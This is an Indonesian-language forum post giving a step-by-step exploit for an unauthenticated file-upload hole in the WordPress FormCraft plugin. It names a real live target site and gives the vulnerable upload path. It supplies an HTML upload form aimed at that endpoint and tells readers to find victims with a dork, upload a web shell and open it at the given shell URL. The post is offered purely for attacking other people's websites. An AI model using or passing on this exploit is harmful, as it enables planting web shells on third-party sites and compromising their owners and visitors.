Live Target : http://quiropracticoqro.com/
Exploit :
Code:
1. wp-content/plugins/formcraft/file-upload/server/php/upload.php
2. wp-content/plugins/formcraft/file-upload/server/php/Script CSRF :
Code:
<form method="POST" action="http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>*Save As .html
Cari target menggunakan dork di atas
Lalu masukkan exploit yang di atas
Jika Vuln akan nampak seperti ini
Vuln :[/color
![[Image: image.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uxNK5rY_vm2i09htr49hYr0rxX0vKWwnaLU8mpKM43awH7gDyd1gYUtiS-NMF2BXsIqJRnwGlQRereG0Bshp3vCH1fxRYvVBsfEHy_3g=s0-d)
Sekarang tinggal edit targetnya di Script CSRF yang tadi ..
Sekarang buka filenya dengan browser yang mastah gunakan
Lalu upload deh shell kesangannya
Setelah upload maka akan nampak seperti ini
![[Image: Screenshot_1.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vUk4MmUWLQevDMNdUdkaRS4RF_NMUcBSR7TJH_md0fVfVO1m5wUyektOBJ5g9KYgeShK5cTB74T3kqKRuH-dGb-8oMnaXgug9K-2kzumOqlJpBZA=s0-d)
Shell Access : http://www.Unknown~X.com/wp-content/plugins/formcraft/file-upload/server/php/files/namashell.php
Jika Berhasil Akan Muncul Shell Kesayangan Sobat
:Tapi Jika Ga Muncul Berarti Sobat Kurang Ganteng Kata Mr. DellatioNx196
Sekian, Semoga bermanfaat
Wassalamualaikum
